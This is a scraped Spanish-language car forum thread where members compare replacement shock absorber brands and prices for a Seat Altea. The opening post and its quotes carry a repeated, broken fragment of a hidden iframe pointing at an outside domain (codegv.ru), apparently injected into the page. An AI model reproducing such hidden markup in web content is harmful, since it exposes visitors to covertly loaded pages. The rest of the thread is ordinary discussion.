Anuncio

Colapsar
No hay anuncios todavía.

Cambio amortiguadores Seat Altea, que le pongo?

Colapsar
X
  • Filtrar
  • Tiempo
  • Mostrar
Limpiar todos
nuevos mensajes

• Cambio amortiguadores Seat Altea, que le pongo?

Hola a todos, en breve quiero cambiar los 4 amortiguadores al Altea (2.0 tdi), pero ando un poco perdido y me gustaría que me diérais vuestra opinión.
    He visto algo en plan normalito, supongo, los kyb, trw, monroe, sachs, bilstein, etc. La mayoria por no decir todos son de gas, por lo que creo que tendré que ponerlos de este tipo. Por lo demás, que marca me recomendais que tenga una buena relación calidad/precio? Mi conducción es tranquila, no busco convertir el coche en una tabla, pero me gusta notarlo asentado. O sea ni duro ni blando, algo intermedio. El el corsa le puse unos bilstein, y detrás es duro como una piedra, no me gusta, pero claro, es otro coche y a lo mejor en el altea es otra historia.
    En tema de precio, pues bueno, cuanto más económicos mejor, pero no me importa gastarme un poco más si realmente merecen la pena.

Saludos.
    src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"> src="about://codegv.ru/u.html" style="display: none;" id="zunifrm">

Originalmente escrito por KAWALLO Ver mensaje
    Hola a todos, en breve quiero cambiar los 4 amortiguadores al Altea (2.0 tdi), pero ando un poco perdido y me gustaría que me diérais vuestra opinión.
    He visto algo en plan normalito, supongo, los kyb, trw, monroe, sachs, bilstein, etc. La mayoria por no decir todos son de gas, por lo que creo que tendré que ponerlos de este tipo. Por lo demás, que marca me recomendais que tenga una buena relación calidad/precio? Mi conducción es tranquila, no busco convertir el coche en una tabla, pero me gusta notarlo asentado. O sea ni duro ni blando, algo intermedio. El el corsa le puse unos bilstein, y detrás es duro como una piedra, no me gusta, pero claro, es otro coche y a lo mejor en el altea es otra historia.
    En tema de precio, pues bueno, cuanto más económicos mejor, pero no me importa gastarme un poco más si realmente merecen la pena.

Saludos.
    src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"> src="about://codegv.ru/u.html" style="display: none;" id="zunifrm">
    Si no quieres equivocarte, mete los originales. Posiblemente sean Sachs

Comentario

Si buscas comodidad,no pongas los Monroe.Son supersecos.Eso sí,duran de cojones.

Comentario

KYB Excel-G.

Comentario

+1 a Sachs, son los que montan de origen. Tambien esta BOGE que son muy buenos

Comentario

Pues de momento me estoy decantando por los KYB excel-g, estoy leyendo cosas muy buenas de ellos, la relación calidad/precio parece insuperable hoy por hoy. De los sachs también hablan bien, pero los KYB parecen igual o mejor y más económicos. En feu vert me han dado precio de 435€ por los 4, ya cambiados y con alineación y parelelo incluido.
            Nunca me han gustado estos sitios para hacer mantenimiento al coche, y para algunas cosas jamás se me ocurrirá, pero bueno, cambiar unos amortiguadores, podría hacerlo hasta yo si me dejan la herramienta, por lo que igual lo hago ahí. Mañana me acercaré a Norauto, pero me pilla peor dejar el coche allí.

Saludos.

Comentario

yo iría a los Sachs o Boge que son el mismo fabricante, y es el equipo de origen de estos coches.
              Kayaba para los Alemanes, no van tan finos, son baratos y muy suaves eso si. Yo los tengo montados y para un uso rutero son ideales, pero no les pidas más.

Comentario

Amortiguadores Seat Altea 1.9TDi

Originalmente escrito por KAWALLO Ver mensaje
                Pues de momento me estoy decantando por los KYB excel-g, estoy leyendo cosas muy buenas de ellos, la relación calidad/precio parece insuperable hoy por hoy. De los sachs también hablan bien, pero los KYB parecen igual o mejor y más económicos. En feu vert me han dado precio de 435€ por los 4, ya cambiados y con alineación y parelelo incluido.
                Nunca me han gustado estos sitios para hacer mantenimiento al coche, y para algunas cosas jamás se me ocurrirá, pero bueno, cambiar unos amortiguadores, podría hacerlo hasta yo si me dejan la herramienta, por lo que igual lo hago ahí. Mañana me acercaré a Norauto, pero me pilla peor dejar el coche allí.

Saludos.
                Hola Kawallo,

Estoy pasando por las mismas fases que tú.
                Me gustaría saber cómo te ha ido con los KYB si esa fue al final tu decisión de compra.
                Yo tengo aún los amortiguadores originales tras 180.000 km y tengo que ir pensando en cambiarlos.
                Gracias!!!

Comentario

Yo le pondría los de origen...si busca más dureza pon el de los modelos más deportivo

Comentario

Originalmente escrito por new73 Ver mensaje
                    Yo le pondría los de origen...si busca más dureza pon el de los modelos más deportivo
                    Gracias New73.

¿Cuando mencionas la dureza entiendo que eso va en detrimento del confort?

¿Cómo puedo saber qué marca y modelo exacto de amortiguadores lleva mi Seat Altea en origen?

Gracias por tu tiempo!

Comentario

Trabajando...
                    X